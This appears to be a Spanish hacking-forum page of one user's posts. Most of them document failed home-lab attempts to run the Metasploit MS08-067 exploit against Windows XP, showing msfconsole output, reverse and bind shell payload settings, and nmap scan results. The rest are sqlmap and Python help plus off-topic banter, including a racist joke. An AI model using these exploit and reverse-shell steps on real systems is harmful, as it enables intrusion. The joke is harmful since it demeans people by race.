Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - rand0m

Páginas 1 ... 3 4 5 6 7 ... 12
#81
Bugs y Exploits / Re:Metasploit | Penetrar una pc. [Exploit]
Agosto 29, 2015, 11:13:48 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Por alguna extraña razón (puede que sea un parche o puede que no) tu samba no permite la interactuación NT_STATUS_ACCESS_DENIED
Hagamos hincapié en que está recién instalado, con todos los valores por defecto excepto el cortafuegos.
Los checks de metasploit dicen que el objetivo no es vulnerable.
Al pie de foto está el SHA1 de la imagen ISO.
#82
Bugs y Exploits / Re:Metasploit | Penetrar una pc. [Exploit]
Agosto 29, 2015, 06:58:46 AM
Me respondo a mí mismo para plantear una respuesta:
CitarOtra hipótesis es que tengas configuradas una políticas de iptables en tu kali de manera que no permite la conexión porque cuando sale el attempting to trigger the vulnerability indica que el meterpreter se ejecuta pero lanza un time out. Puedes probar a cambiar el payload por un bind_tcp.
Otro problema como tu dices sería la red normalmente la gente tiene problema al dejarlo en NAT pero como mencionaste anteriormente la tienes en adaptador puente ¿Has seleccionado replicar el estado?
De primeras el estado de la tarjeta no estaba replicado. Marqué la casilla en la configuración de VMware y arranqué de nuevo. Bien, empezando por las iptables, éstas están desactivadas.
Código: text
root@KaliSana:/home/rand0m# iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         

He probado a pasarle un scan de vulnerabilidades con nmap y éste es el resultado.
Código: text
Service Info: OS: Windows XP; CPE: cpe:/o:microsoft:windows_xp

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-check-vulns: 
|   MS08-067: NOT VULNERABLE
|   Conficker: Likely CLEAN
|   SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|   MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_  MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
|_smb-vuln-ms10-054: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)

TRACEROUTE
HOP RTT     ADDRESS
1   0.51 ms x-c77d82deb3b94.home (192.168.1.17)

Y como llevo intentando desde ayer el exploit sigue sin funcionar.
Sigo afirmando, convencido a un 90%, que mi CD de instalación instaló un Windows XP SP3 parcheado.
Aunque tampoco os calléis. ¡El debate está abierto y más vivo que nunca!
#83
Off Topic / Re:Guerra de cosas! ¿Qué elegís?
Agosto 29, 2015, 06:49:59 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
amigos o novias

Amigas ligeras de cascos.
¿Lynyrd Skynyrd o Creedence?
#84
Bugs y Exploits / Re:Metasploit | Penetrar una pc. [Exploit]
Agosto 28, 2015, 06:09:29 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login al parecer lo que esta andando mal es el payload no el exploit, proba con alguna shell inversa como windows/meterpreter/reverse_tcp.
En el primer intento que hice fue el que intenté utilizar. Acabo de usarlo contra la máquina nueva y sigue sin dar resultado.

Código: text
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.17     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST     192.168.1.14     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

Partiendo de aquí hacemos cuantos intentos queramos, que el resultado es el mismo.
Código: text
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.14:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.14
LHOST => 192.168.1.14
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.14:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) > set payload windows/shell/bind_tcp
payload => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...

No sé si es que estoy haciendo algo mal (A lo que agradecería que alguien arrojase algo de luz) o es que realmente el Windows no es vulnerable, como venía diciendo desde el principio.
#85
Bugs y Exploits / Re:Metasploit | Penetrar una pc. [Exploit]
Agosto 28, 2015, 05:08:23 PM
Bueno, visto lo visto he creado una máquina virtual nueva y le he instalado Windows XP SP3, desactivando las actualizaciones automáticas durante la instalación. Los únicos clicks que se hicieron en esta nueva máquina fueron para acceder al Panel de Control y desactivar el firewall.
Al lanzar el exploit no obtenemos un resultado satisfactorio, por eso compruebo la conectividad de la siguiente manera:

  • Hago ping a la máquina WinXPSP3 y ésta responde correctamente (192.168.1.17)
  • Pongo el puerto 4444 a la escucha con netcat y, desde Windows, accedo con Internet Explorer a 192.168.1.15:4444
Ambas pruebas funcionan, por lo que sabemos que la máquina con Kali se comunica correctamente con la máquina Windows y viceversa. Además, por si acaso, me aseguré de que Windows puede realizar conexiones salientes al puerto 4444.
¿Qué ocurre, entonces? Que las instalaciones difieren. Mientras mi disco de Windows instala un sistema parcheado el que utilizó para el ejemplo MagoAstral no instaló tal parche.
Y de ahí que ambos tuviéramos razón: Windows XP SP3 puede ser vulnerable tras la instalación si lo instalamos desde una versión sin parchear. De todas formas los usuarios no suelen desactivar las actualizaciones automáticas, así que si ya es poco probable encontrarnos frente a un WinXP (Sin soporte por parte de M$), menos probable aún será que sea vulnerable a este exploit.
#86
Dudas y pedidos generales / Re:Ayuda entre Maquinas virtuales.
Agosto 28, 2015, 04:24:40 PM
Si tienes instaladas las VMware Tools debería ser suficiente con copiarlo en un sitio y pegarlo en otro.
#87
Off Topic / Re:Guerra de cosas! ¿Qué elegís?
Agosto 28, 2015, 03:50:44 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Quemando los dedos.

todojunto o se pa ra do?

se pa ra do
Cancer o sida?
Cáncer de SIDA

¿Silla de ruedas o impotencia?
#88
Bugs y Exploits / Re:Metasploit | Penetrar una pc. [Exploit]
Agosto 28, 2015, 11:02:18 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Aquí tienes una prueba de concepto con el mismo exploit que usted ha intentado utilizar:
1º- Eso no es una prueba de concepto. Si quieres llamarlo de alguna manera llámalo Demo.
2º - Sí, podemos preparar un entorno Windows para que sea vulnerable, pero por defecto no lo es.
3º- ¿A qué viene lo de los entornos virtuales? ¿Eres tonto o qué te pasa? Estas capturas son de máquinas corriendo en VMware. ¿A qué viene eso?

--EDIT--
No busques vídeos de terceros. Prueba lo que dices, como hice yo.
#89
Off Topic / Re:Guerra de cosas! ¿Qué elegís?
Agosto 28, 2015, 10:20:08 AM
Programación.

¿Marihuana o alcohol?
#90
Bugs y Exploits / Re:Metasploit | Penetrar una pc. [Exploit]
Agosto 28, 2015, 09:41:04 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Lamento decepcionarte pero el exploit no sólo afecta al service pack 1 de Windows XP. Si dedicas 2 minutos a buscar información sobre dicho exploit en la página principal de rapid7 (You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login) podrás ver que afecta desde el SP1 hasta el SP3 pasando por el SP2 además de Windows 2000 (Universal)  y Windows 2003 (SP1 y SP2).
No sé, chico, pero tus estadísticas se desmienten en el laboratorio.
Para más dudas te recomiendo que montes un hacklab y pruebes las cosas.
#91
Dudas y pedidos generales / Re:Test de Stress
Agosto 28, 2015, 08:33:34 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Los test de stress consisten en hacer fallar al sistema por medio de un exceso de peticiones y ver como regresa a su estado normal además de examinar esa falla.
Entonces entiendo que con tests de stress nos referimos a Fuzzers.
#92
Dudas y pedidos generales / Re:Duda con lista en Python
Agosto 28, 2015, 08:05:53 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Conclusión: siempre que escribas cualquier código, primero pensá bien qué es lo que querés hacer y cómo vas a lograrlo. Planificá bien todo y, recién ahí sentate a codear. Python es simple. No te compliques. Siempre que tengas un código medio redundante, analizalo bien porque seguro que hay cosas prescindibles.
Además de eso, añadir también que a la hora de hacer un simple snippet como éste no se nota demasiado, pero cuando estamos haciendo algo más largo el tamaño del script se nos puede desmadrar por estas cosas.

Aunque eso ya va con la práctica, sobre todo.
#93
Dudas y pedidos generales / Re:Ayuda entre Maquinas virtuales.
Agosto 28, 2015, 07:23:14 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
no tengo idea si en VMware u otras es lo mismo
En VMware, con la máquina arrancada, hacemos click en "Player">"Manage">"Install VMware Tools". Ésto nos monta una unidad de CD que deberemos copiar a nuestra carpeta /tmp/ (Por ejemplo, es a donde suelo llevarlo yo), descomprimirlo e instalarlo.
Nos pedirá que tengamos las cabeceras de nuestro kernel.
Para instalarlo en kali basta con lo siguiente:
Código: Bash
#apt-get install linux-headers-`uname -r`

*** Nota `uname -r`: Lo que escribimos entre "`" se ejecutará como comando y se cambiará por el resultado. Por ejemplo:
Código: text
root@KaliSana:~# uname -r
4.0.0-kali1-686-pae
root@KaliSana:~# echo "linux-headers-`uname -r`"
linux-headers-4.0.0-kali1-686-pae
#94
Dudas y pedidos generales / Re:Test de Stress
Agosto 28, 2015, 07:15:54 AM
Soy pobre, así que nunca tuve una infraestructura con la que hacer estas cosas. Tenéis toda mi atención.
#95
Dudas y pedidos generales / Re:Duda con lista en Python
Agosto 28, 2015, 07:13:16 AM
Esto de contar los caracteres en una lista me suena. ¿Es de algún wargame?
#96
Off Topic / Re:Feliz cumpleaños Gabriela!!!
Agosto 28, 2015, 07:12:02 AM
Si no recuerdo mal es la que siempre felicita a los foreros. Creo que ya sólo por eso se merece felicitarla por el suyo.
Y nadie mejor para felicitar un cumpleaños que el ciego que creía que ser ciego no era tan malo, que sería peor ser negro: Stivie Wonder
#97
Dudas y pedidos generales / Re:Mensaje sqlmap
Agosto 28, 2015, 07:04:24 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
[10:45:19] [WARNING] GET parameter 'id' is not injectable
Lo ideal en estos casos es que busques el SQLi manualmente y luego le pases a los parámetros correctos.
Tienes un montón de información de SQLi en el foro escrito por nuestros compañeros. Ahora te toca leer a ti.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
ahh y ademas este mensaje me trae de cabeza... estoy buscando alguna solucion en internet y  la mayoria es en ingles...

[20:22:05] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
Ese mensaje está muy claro. Estás empezando a pedir que usemos sqlmap por ti. Deberías descargarte algún wargame con los que practicar en vez de estar atacando bases de datos privadas con una conexión sin ofuscar, porque está claro que no tienes ni idea de SQLi. Lo siento, pero eso se ve.
Con respecto al inglés ya puedes ir aprendiéndolo o dedicándote a otra cosa. Es algo inamovible. Cualquiera de este foro te lo confirmará.
#98
Back-end / Re:Ver ip real a través de proxy o vpn
Agosto 28, 2015, 06:53:45 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Alguien lo usa y le funciona??  Creo que es momento de cambiar de navegador. Alguien sugiere alguno open? Cómo está Iceweasel?
Yo estoy utilizando Disable WebRTC en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (Mozilla Firefox 64bit) desde hace bastante tiempo y no tengo ningún problema.
#99
Dudas y pedidos generales / Re:Duda con lista en Python
Agosto 28, 2015, 06:47:07 AM
Como bien dijo WhiZ:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
El problema es que la lista se volvía a crear con cada bucle. Tenés que crearla afuera (lista = []) y dentro del bucle le agregas los valores que quieras (lista.append()).
En tu código bastaría con incluir un array en el que guardar el resultado, tal que así:
Código: python
cadena="aAbbBcCab"
n=0
resultado = []
for caracter in cadena:
    a=cadena.count(caracter)
    y=str(a)
    z=len(cadena)
    lista=range(z)
    lista[n]=y+caracter
    resultado.append(lista[n])
    n=n+1
print resultado[:]

CitarZ:\amazingdir>python You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
['2a', '1A', '3b', '3b', '1B', '1c', '1C', '2a', '3b']
#100
Bugs y Exploits / Re:Metasploit | Penetrar una pc. [Exploit]
Agosto 28, 2015, 06:25:20 AM
Yo quisiera añadir también que esta vulnerabilidad sólo afecta a Windows XP SP1. La actualización a SP2 ya corrige el fallo.
Este exploit es de la prehistoria. ¿En serio esperáis tener resultados con él? Salieron muchísimos parches desde entonces.
Páginas 1 ... 3 4 5 6 7 ... 12